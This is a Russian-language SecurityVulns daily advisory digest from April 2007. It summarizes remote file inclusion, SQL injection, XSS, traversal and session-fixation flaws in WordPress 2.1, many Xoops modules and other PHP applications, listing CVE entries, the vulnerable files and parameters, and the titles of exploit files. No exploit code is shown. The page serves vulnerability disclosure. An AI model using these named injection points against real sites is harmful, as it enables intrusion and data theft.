Информационная безопасность
[RU] switch to English


Ежедневная сводка ошибок в Web-приложениях (PHP, ASP, JSP, CGI, Perl )
дополнено с 5 апреля 2007 г.
Опубликовано:5 апреля 2007 г.
Источник:
SecurityVulns ID:7534
Тип:удаленная
Уровень опасности:
5/10
Описание:Инъекции PHP, инъекции SQL, обратный путь в каталогах, межсайтовый скриптинг, утечка информации и т.д.
Затронутые продукты:PHPMYNEWSLETTER : phpMyNewsletter 0.6
 FLEXPHPNEWS : Flexphpnews 0.0
 MYSPEACH : MySpeach 3.0
 WORDPRESS : WordPress 2.1
 MAPTOOLS : MapLab 2.2
 LITECMS : lite-cms 0.2
 EXV2 : eXV2 CMS 2.0
 PHPEXPLORATOR : phpexplorator 2.0
 IXONCMS : iXon-CMS 0.30
 KCMS : K-CMS 1.0
 MONKEYCMS : Monkey CMS 0.0
 PHPECHOCMS : phpechocms 2
 XOOPS : RM+Soft Gallery 1.0 module for Xoops
 XOOPS : myAlbum-P 2.0 module for Xoops
 XOOPS : debaser 0.92 module for Xoops
 XOOPS : Camportail 1.1 module for Xoops
 XOOPS : Kshop 1.17 module for Xoops
 XOOPS : Tiny Event 1.01 module for Xoops
 XOOPS : eCal 2.24 module for Xoops
 XOOPS : Zmagazine 1.0 module for Xoops
 XOOPS : XFsection 1.07 module for Xoops
 XOOPS : WF-Section 1.01 module for Xoops
 XOOPS : PopnupBlog 2.52 module for Xoops
 XOOPS : Rha7 Downloads 1.0 module for Xoops
 XOOPS : WF-Snippets 1.02 module for Xoops
 CYBOARDS : CyBoards PHP Lite 1.21
 PHPBB : mutant 0.9 module for phpBB
 AROUNDME : AROUNDMe 0.7
 RSPA : Really Simple PHP and Ajax 2007-03-23
 CWBPRO : CWB PRO 1.5
 BTSONDAGE : BT-Sondage 1.12
CVE:CVE-2007-1988 (Cross-site scripting (XSS) vulnerability in kernel/filters.inc.php in PHPEcho CMS 2.0 allows remote attackers to inject arbitrary web script or HTML via the id parameter.)
 CVE-2007-1987 (** DISPUTED ** Multiple PHP remote file inclusion vulnerabilities in PHPEcho CMS 2.0 allow remote attackers to execute arbitrary PHP code via a URL in the (1) _plugin_file parameter to smarty/internals/core.load_pulgins.php or the (2) root_path parameter to index.php. NOTE: CVE disputes (1) because the inclusion occurs within a function that is not called during a direct request. CVE disputes (2) because root_path is defined in config.php before use.)
 CVE-2007-1986 (Multiple PHP remote file inclusion vulnerabilities in barnraiser AROUNDMe 0.7.7 allow remote attackers to execute arbitrary PHP code via a URL in the (1) language_path_core parameter to inc/core_profile.header.php, the (2) template_path_core parameter to template/barnraiser_01/maint_contact_view.tpl.php, and the (3) template_path parameter to template/barnraiser_01/default.tpl.php. NOTE: this issue might overlap CVE-2006-5533.)
 CVE-2007-1985 (Multiple PHP remote file inclusion vulnerabilities in phpexplorator.php in phpexplorator 2.0 allow remote attackers to execute arbitrary PHP code via a URL in the (1) cmd or (2) lang_path parameter.)
 CVE-2007-1984 (PHP remote file inclusion vulnerability in index.php in lite-cms 0.2.1 allows remote attackers to execute arbitrary PHP code via a URL in the inc parameter.)
 CVE-2007-1983 (PHP remote file inclusion vulnerability in include/default_header.php in Cyboards PHP Lite 1.21 allows remote attackers to execute arbitrary PHP code via a URL in the script_path parameter, a different vector than CVE-2006-2871.)
 CVE-2007-1982 (Multiple PHP remote file inclusion vulnerabilities in Really Simple PHP and Ajax (RSPA) 2007-03-23 and earlier allow remote attackers to execute arbitrary PHP code via a URL in the (1) __IncludeFilePHPClass, (2) __ClassPath, and (3) __class parameters to (a) rspa/framework/Controller_v5.php, and (b) rspa/framework/Controller_v4.php.)
 CVE-2007-1980 (SQL injection vulnerability in index.php in the Topliste 1.0 module for PHP-Fusion allows remote attackers to execute arbitrary SQL commands via the cid parameter.)
 CVE-2007-1979 (SQL injection vulnerability in index.php in the PopnupBlog 2.52 and earlier module for Xoops allows remote attackers to execute arbitrary SQL commands via the postid parameter, possibly involving the get_blogid_from_postid function in class/PopnupBlogUtils.php. NOTE: later versions such as 3.03 and 3.05 might also be affected.)
 CVE-2007-1978 (SQL injection vulnerability in index.php in the Arcade 1.00 module for PHP-Fusion allows remote attackers to execute arbitrary SQL commands via the cid parameter in a view_game_list action.)
 CVE-2007-1974 (SQL injection vulnerability in the getArticle function in class/wfsarticle.php in WF-Section (aka WF-Sections) 1.0.1, as used in Xoops modules such as (1) Zmagazine 1.0, (2) Happy Linux XFsection 1.07 and earlier, and possibly other modules, allows remote attackers to execute arbitrary SQL commands via the articleid parameter to print.php.)
 CVE-2007-1967 (** DISPUTED ** PHP remote file inclusion vulnerability in index.php in stat12 allows remote attackers to execute arbitrary PHP code via a URL in the langpath parameter. NOTE: this issue was published by an unreliable researcher, and there is little information to determine which product is actually affected. This is probably an invalid report based on analysis by CVE and a third party.)
 CVE-2007-1966 (Session fixation vulnerability in eXV2 CMS 2.0.4.3 and earlier allows remote attackers to hijack web sessions by setting the PHPSESSID cookie.)
 CVE-2007-1965 (Multiple cross-site scripting (XSS) vulnerabilities in eXV2 CMS 2.0.4.3 and earlier allow remote attackers to inject arbitrary web script or HTML via the set_lang parameter to (1) archive.php, (2) article.php, (3) index.php, or (4) topics.php.)
 CVE-2007-1962 (SQL injection vulnerability in index.php in the WF-Snippets 1.02 and earlier module for XOOPS allows remote attackers to execute arbitrary SQL commands via the c parameter in a cat action.)
 CVE-2007-1961 (PHP remote file inclusion vulnerability in mutant_functions.php in the Mutant 0.9.2 portal for phpBB 2.2 allows remote attackers to execute arbitrary PHP code via a URL in the phpbb_root_path parameter.)
 CVE-2007-1960 (SQL injection vulnerability in visit.php in the Rha7 Downloads (rha7downloads) 1.0 module for XOOPS, and possibly other versions up to 1.10, allows remote attackers to execute arbitrary SQL commands via the lid parameter.)
 CVE-2007-1897 (SQL injection vulnerability in xmlrpc (xmlrpc.php) in WordPress 2.1.2, and probably earlier, allows remote authenticated users to execute arbitrary SQL commands via a string parameter value in an XML RPC mt.setPostCategories method call, related to the post_id variable.)
 CVE-2007-1896 (Directory traversal vulnerability in chat.php in Sky GUNNING MySpeach 3.0.7 and earlier allows remote attackers to include arbitrary local files via a .. (dot dot) and trailing %00 (NULL) in a my_ms[root] cookie.)
 CVE-2007-1895 (PHP remote file inclusion vulnerability in chat.php in Sky GUNNING MySpeach 3.0.7 and earlier, when used with PHP 5, allows remote attackers to execute arbitrary PHP code via an ftp URL in a my_ms[root] cookie, a different vector than CVE-2007-0491 and CVE-2006-4630.)
 CVE-2007-1894 (Cross-site scripting (XSS) vulnerability in wp-includes/general-template.php in WordPress before 20070309 allows remote attackers to inject arbitrary web script or HTML via the year parameter in the wp_title function.)
 CVE-2007-1893 (xmlrpc (xmlrpc.php) in WordPress 2.1.2, and probably earlier, allows remote authenticated users with the contributor role to bypass intended access restrictions and invoke the publish_posts functionality, which can be used to "publish a previously saved post.")
 CVE-2007-1851 (Multiple directory traversal vulnerabilities in Really Simple PHP and Ajax (RSPA) 2007-03-23 allow remote attackers to include and execute arbitrary local files via a .. (dot dot) in the __class parameter to (1) Controller_v4.php or (2) Controller_v5.php.)
 CVE-2007-1813 (SQL injection vulnerability in display.php in the eCal 2.24 and earlier module for Xoops allows remote attackers to execute arbitrary SQL commands via the katid parameter.)
 CVE-2007-1812 (PHP remote file inclusion vulnerability in utilitaires/gestion_sondage.php in BT-Sondage 112 allows remote attackers to execute arbitrary PHP code via a URL in the repertoire_visiteur parameter.)
 CVE-2007-1811 (SQL injection vulnerability in index.php in the Tiny Event (tinyevent) 1.01 and earlier module for Xoops allows remote attackers to execute arbitrary SQL commands via the id parameter in a show action.)
 CVE-2007-1810 (SQL injection vulnerability in product_details.php in the Kshop 1.17 and earlier module for Xoops allows remote attackers to execute arbitrary SQL commands via the id parameter.)
 CVE-2007-1809 (Multiple PHP remote file inclusion vulnerabilities in GraFX Company WebSite Builder (CWB) PRO 1.5 allow remote attackers to execute arbitrary PHP code via a URL in the INCLUDE_PATH parameter to (1) cls_headline_prod.php, (2) cls_listorders.php, or (3) cls_viewpastorders.php in include/, different vectors than CVE-2007-1513.)
 CVE-2007-1808 (SQL injection vulnerability in show.php in the Camportail 1.1 and earlier module for Xoops allows remote attackers to execute arbitrary SQL commands via the camid parameter in a showcam action.)
 CVE-2007-1807 (SQL injection vulnerability in modules/myalbum/viewcat.php in the myAlbum-P 2.0 and earlier module for Xoops allows remote attackers to execute arbitrary SQL commands via the cid parameter.)
 CVE-2007-1806 (SQL injection vulnerability in categos.php in the RM+Soft Gallery (rmgallery) 1.0 module for Xoops allows remote attackers to execute arbitrary SQL commands via the idcat parameter.)
 CVE-2007-1805 (SQL injection vulnerability in genre.php in the debaser 0.92 and earlier module for Xoops allows remote attackers to execute arbitrary SQL commands via the genreid parameter.)
Оригинальный текстdocumentSumit Siddharth, [Full-disclosure] Wordpress 2.1.2 xmlrpc Vulnerabilities (06.04.2007)
 documentCrackers_Child, CWB PRO Version 1.5(INCLUDE_PATH)Remote File Include Vulnerabilites (05.04.2007)
 documentGolD_M, CWB PRO Version 1.5(INCLUDE_PATH)Remote File Include Vulnerabilites (05.04.2007)
 documentDj7xpl, Flexphpnews 0.0.5 (news.php newsid) Remote SQL Injection Vulnerability (05.04.2007)
 documentka0x, MapLab MS4W 2.2.1 Remote File Inclusion Vulnerability (05.04.2007)
 documentXORON, PHP-FUSION Arcade Module (cid) Remote SQL Injection Vuln (05.04.2007)
 documentXORON, PHP-FUSION topliste Module (cid) Remote SQL Injection Vuln (05.04.2007)
 documentHamid Ebadi, RSPA Remote File Inclusion (05.04.2007)
 documentXst3nZ, MySpeach <= 3.0.7 Remote/Local File Inclusion Vulnerability (05.04.2007)
 documentfrog frog, phpMyNewsletter 0.6.10 (customize.php l) RFI Vulnerability: (05.04.2007)
 documentkezzap66345, AROUNDMe 0.7.7 Multiple Remote File Inclusion Vulnerabilities (05.04.2007)
 documentthe_3dit0r_(at)_yahoo.com, MyBlog: PHP and MySQL Blog/CMS software Remote File Include Vulnerabilitiy (05.04.2007)
 documentthe_3dit0r_(at)_yahoo.com, MyBlog: PHP and MySQL Blog/CMS software Cross-Site Scripting Vulnerabilitiy (05.04.2007)
 documentthe_3dit0r_(at)_yahoo.com, phpechocms2 Remote File Include Vulnerabilities (05.04.2007)
 documentthe_3dit0r_(at)_yahoo.com, phpechocms v.2 Cross-Site Scripting Vulnerabilitiy (05.04.2007)
 documentthe_3dit0r_(at)_yahoo.com, Monkey CMS v0.0.3 Remote File Include Vulnerabilitiy (05.04.2007)
 documentthe_3dit0r_(at)_yahoo.com, K-CMS v1.0 Remote File Include Vulnerabilities (05.04.2007)
 documentthe_3dit0r_(at)_yahoo.com, iXon_CMS 0.30 Remote File Include Vulnerabilities (05.04.2007)
 documentRaeD Hasadya, Remot File Include In phpexplorator_2_0 (05.04.2007)
 documentSecurityAudit_(at)_majorsecurity.de, [MajorSecurity Advisory #38]eXV2 CMS - Session fixation and Cross-Site-Scripting Issues (05.04.2007)
 documentthe_3dit0r_(at)_yahoo.com, lite-cms-0.2.1 Remote File Include Vulnerabilities (05.04.2007)
 documentRaeD Hasadya, Remote File Include In Script stat12 (05.04.2007)
Файлы:XOOPS Module RM+Soft Gallery 1.0(categos.php) BLIND SQL Injection Exploit
 XOOPS Module myAlbum-P <= 2.0 (cid) Remote BLIND SQL Injection Exploit
 XOOPS Module debaser <= 0.92(genre.php) BLIND SQL Injection Exploit
 XOOPS Module Camportail <= 1.1 (camid) Remote BLIND SQL Injection Exploit
 XOOPS Module Kshop <= 1.17 (id) Remote BLIND SQL Injection Exploit
 XOOPS Module Tiny Event <= 1.01 (id) Remote BLIND SQL Injection Exploit
 XOOPS Module eCal 2.24 <= (display.php) Remote BLIND SQL Injection Exploit
 XOOPS Module Zmagazine 1.0 (print.php) Remote BLIND SQL Injection Exploit
 XOOPS Module XFsection <= 1.07 (articleid) BLIND SQL Injection Exploit
 XOOPS Module WF-Section <= 1.01 (articleid) Remote BLIND SQL Injection Exploit
 XOOPS Module PopnupBlog <= 2.52 (postid) BLIND SQL Injection Exploit
 XOOPS Module Rha7 Downloads 1.0 (visit.php) Remote BLIND SQL Injection Exploit
 XOOPS Module WF-Snippets <= 1.02 (c) BLIND SQL Injection Exploit
 CyBoards PHP Lite 1.21 (script_path) Remote File Include Exploit
 phpBB mutant 0.9.2 (phpbb_root_path) Remote File Inclusion Exploit
 Wordpress 2.1.2 SQL Injection POC
 WinMail Server 4.4 build 1124 (WebMail) remote add new Super User exploit

О сайте | Условия использования
© SecurityVulns, 3APA3A, Владимир Дубровин
Нижний Новгород